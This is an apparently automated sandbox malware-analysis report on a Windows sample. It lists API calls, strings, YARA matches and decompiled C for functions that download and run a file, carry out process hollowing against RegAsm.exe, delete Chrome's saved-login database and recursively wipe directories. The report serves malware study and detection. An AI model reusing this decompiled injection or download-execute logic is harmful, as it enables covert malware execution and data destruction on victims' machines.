                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                  • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                  • free.MSVCRT(?,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,?), ref: 0040D643
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  • open, xrefs: 0040D5BA
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040D636
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                  • API String ID: 2294739476-3056885514
                                  • Opcode ID: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                  • Opcode Fuzzy Hash: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410145, Relevance: 31.7, APIs: 21, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6B015DF0), ref: 0041016E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                  • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                    • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                    • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                    • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                  • String ID:
                                  • API String ID: 1196022968-0
                                  • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                  • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403325, Relevance: 27.1, APIs: 18, Instructions: 109fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                  • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00403379
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898,?,?,00000000), ref: 00403392
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,?,?,00000000), ref: 00403399
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 004033A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004033C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004033CE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004033D7
                                  • FindNextFileW.KERNEL32(?,?), ref: 004033ED
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00403402
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403411
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040341D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040342F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040344A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050), ref: 0040345F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@G@std@@$G@2@@std@@$D@1@@V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@V?$basic_string@$??9std@@?length@?$basic_string@D@2@@0@FirstG@1@@G@2@@0@Hstd@@NextV10@0@
                                  • String ID:
                                  • API String ID: 3638635289-0
                                  • Opcode ID: fb7e7f8a23c4865ccf3e554ece68bd99fc057a5f5f51279deb56dd3fe4515c10
                                  • Instruction ID: 5773dbc557d9876992c7e48c4d97bf12bb9d98964626974f027bca1071927927
                                  • Opcode Fuzzy Hash: fb7e7f8a23c4865ccf3e554ece68bd99fc057a5f5f51279deb56dd3fe4515c10
                                  • Instruction Fuzzy Hash: E641FB7290050DEBCB04ABA0DC49DEEBB7CEB94355F404166F512E30A0EF745689CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F219, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 157injectionthreadmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0040F219() {
				void* _t59;
				void* _t60;
				void _t71;
				void* _t72;
				signed int _t74;
				CONTEXT* _t80;
				intOrPtr _t85;
				intOrPtr* _t93;
				signed int _t95;
				void* _t100;
				CONTEXT* _t110;
				struct _PROCESS_INFORMATION* _t114;
				void* _t115;
				void* _t117;

				L00413ECA();
				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				_t59 =  *(_t115 + 0xc);
				 *(_t115 - 0x74) = _t59;
				if( *_t59 != 0x5a4d) {
					L16:
					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
					_t60 = 0;
				} else {
					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
					if( *_t93 != 0x4550) {
						goto L16;
					} else {
						_t95 = 0x11;
						memset(_t115 - 0x60, 0, _t95 << 2);
						_t114 =  *(_t115 + 0x10);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
							goto L16;
						} else {
							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
							 *(_t115 - 0x70) = _t110;
							_t110->ContextFlags = 0x10007;
							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
								goto L16;
							} else {
								_t71 =  *(_t115 - 0x1c);
								if(_t71 ==  *(_t93 + 0x34)) {
									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
								}
								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
								 *(_t115 - 0x6c) = _t72;
								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
									goto L16;
								} else {
									_t74 = 0;
									 *(_t115 - 0x64) = 0;
									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
										_t100 =  *(_t115 + 0xc);
										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
										_t74 =  *(_t115 - 0x64);
									}
									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
										goto L16;
									} else {
										_t80 =  *(_t115 - 0x70);
										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
											goto L16;
										} else {
											_t60 = 1;
										}
									}
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
				return _t60;
			}

















                                  0x0040f21e
                                  0x0040f229
                                  0x0040f22c
                                  0x0040f247
                                  0x0040f24a
                                  0x0040f24d
                                  0x0040f255
                                  0x0040f3c7
                                  0x0040f3c7
                                  0x0040f3cb
                                  0x0040f25b
                                  0x0040f25e
                                  0x0040f260
                                  0x0040f269
                                  0x00000000
                                  0x0040f26f
                                  0x0040f271
                                  0x0040f277
                                  0x0040f279
                                  0x0040f27e
                                  0x0040f27f
                                  0x0040f280
                                  0x0040f281
                                  0x0040f29c
                                  0x00000000
                                  0x0040f2a2
                                  0x0040f2b2
                                  0x0040f2b4
                                  0x0040f2b7
                                  0x0040f2c9
                                  0x00000000
                                  0x0040f2f1
                                  0x0040f2f1
                                  0x0040f2f7
                                  0x0040f2fc
                                  0x0040f2fc
                                  0x0040f30e
                                  0x0040f314
                                  0x0040f319
                                  0x00000000
                                  0x0040f33a
                                  0x0040f33a
                                  0x0040f33c
                                  0x0040f33f
                                  0x0040f34a
                                  0x0040f353
                                  0x0040f35a
                                  0x0040f371
                                  0x0040f373
                                  0x0040f376
                                  0x0040f376
                                  0x0040f396
                                  0x00000000
                                  0x0040f398
                                  0x0040f39e
                                  0x0040f3a1
                                  0x0040f3b3
                                  0x00000000
                                  0x0040f3c3
                                  0x0040f3c3
                                  0x0040f3c3
                                  0x0040f3b3
                                  0x0040f396
                                  0x0040f319
                                  0x0040f2c9
                                  0x0040f29c
                                  0x0040f269
                                  0x0040f3d0
                                  0x0040f3db

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 0040F21E
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,73BCF560), ref: 0040F23A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                  • CreateProcessW.KERNEL32 ref: 0040F294
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,73BCF560), ref: 0040F2AC
                                  • GetThreadContext.KERNEL32(?,00000000,?,00000000,73BCF560), ref: 0040F2C1
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F2E3
                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,73BCF560), ref: 0040F30E
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,73BCF560), ref: 0040F330
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,73BCF560), ref: 0040F371
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,73BCF560), ref: 0040F392
                                  • SetThreadContext.KERNEL32(?,?,?,00000000,73BCF560), ref: 0040F3AB
                                  • ResumeThread.KERNEL32(?,?,00000000,73BCF560), ref: 0040F3B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                  • API String ID: 65594003-1050664331
                                  • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                  • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040710F, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E0040710F() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome StoredLogins found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome StoredLogins not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                  0x00407124
                                  0x0040712f
                                  0x00407136
                                  0x0040713a
                                  0x00407145
                                  0x0040714e
                                  0x0040715d
                                  0x004071b1
                                  0x004071b7
                                  0x004071bf
                                  0x004071c1
                                  0x004071c4
                                  0x00000000
                                  0x004071ca
                                  0x00407166
                                  0x00407167
                                  0x0040719c
                                  0x00407178
                                  0x0040717e
                                  0x00407184
                                  0x0040718f
                                  0x00000000
                                  0x00407195
                                  0x0040716a
                                  0x00407173
                                  0x00000000
                                  0x00407176
                                  0x0040716c
                                  0x00000000

                                  APIs
                                  • getenv.MSVCRT ref: 00407124
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                  • GetLastError.KERNEL32 ref: 0040715F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                  Strings
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                  • [Chrome StoredLogins not found], xrefs: 00407179
                                  • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                  • UserProfile, xrefs: 0040711F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 3740952235-1062637481
                                  • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                  • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412BEE, Relevance: 24.1, APIs: 16, Instructions: 111fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412BEE(wchar_t* _a4) {
				signed char _v5;
				void* _v12;
				short _v532;
				long _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				void* _t46;

				wcscpy( &_v1052, _a4);
				wcscat( &_v1052, L"\\*");
				wcscpy( &_v532, _a4);
				wcscat( &_v532, "\\");
				_t46 = FindFirstFileW( &_v1052,  &_v1644);
				_v12 = _t46;
				if(_t46 == 0xffffffff) {
					L18:
					return 0;
				}
				wcscpy( &_v1052,  &_v532);
				_v5 = 1;
				do {
					if(FindNextFileW(_v12,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L17:
							FindClose(_v12);
							goto L18;
						}
						_v5 = _v5 & 0x00000000;
						goto L14;
					}
					if(E00412BBA( &(_v1644.cFileName)) != 0) {
						goto L14;
					}
					wcscat( &_v532,  &(_v1644.cFileName));
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L17;
						} else {
							L7:
							wcscpy( &_v532,  &_v1052);
							goto L14;
						}
					}
					if(E00412BEE( &_v532) == 0) {
						goto L17;
					}
					RemoveDirectoryW( &_v532);
					goto L7;
					L14:
				} while (_v5 != 0);
				FindClose(_v12);
				return RemoveDirectoryW(_a4);
			}









                                  0x00412c0a
                                  0x00412c1e
                                  0x00412c2a
                                  0x00412c38
                                  0x00412c4b
                                  0x00412c54
                                  0x00412c57
                                  0x00412d52
                                  0x00000000
                                  0x00412d52
                                  0x00412c6b
                                  0x00412c75
                                  0x00412c79
                                  0x00412c8b
                                  0x00412d26
                                  0x00412d49
                                  0x00412d4c
                                  0x00000000
                                  0x00412d4c
                                  0x00412d28
                                  0x00000000
                                  0x00412d28
                                  0x00412ca0
                                  0x00000000
                                  0x00000000
                                  0x00412cb4
                                  0x00412cbf
                                  0x00412cf6
                                  0x00412d04
                                  0x00412d04
                                  0x00412d19
                                  0x00000000
                                  0x00412d1b
                                  0x00412cdb
                                  0x00412ce9
                                  0x00000000
                                  0x00412cec
                                  0x00412d19
                                  0x00412cd0
                                  0x00000000
                                  0x00000000
                                  0x00412cd9
                                  0x00000000
                                  0x00412d2c
                                  0x00412d2c
                                  0x00412d39
                                  0x00000000

                                  APIs
                                  • wcscpy.MSVCRT ref: 00412C0A
                                  • wcscat.MSVCRT ref: 00412C1E
                                  • wcscpy.MSVCRT ref: 00412C2A
                                  • wcscat.MSVCRT ref: 00412C38
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                  • wcscpy.MSVCRT ref: 00412C6B
                                  • FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                  • wcscat.MSVCRT ref: 00412CB4
                                  • wcscpy.MSVCRT ref: 00412CE9
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412D04
                                  • DeleteFileW.KERNEL32(?), ref: 00412D11
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                  • GetLastError.KERNEL32 ref: 00412D1D
                                  • FindClose.KERNEL32(004085F5), ref: 00412D39
                                  • RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • FindClose.KERNEL32(004085F5), ref: 00412D4C
                                    • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BCC
                                    • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BDC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 520940213-0
                                  • Opcode ID: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                  • Instruction ID: fb5d4b3d5d58ecc2c3d6dfc175ce5965a41efe56bc0731aa74bc7a01e785bf8c
                                  • Opcode Fuzzy Hash: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                  • Instruction Fuzzy Hash: BE415E72C0421CAADF21DBA0DD88FDE7BBDAF44304F1445A6E504E2050EBB59AD5CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

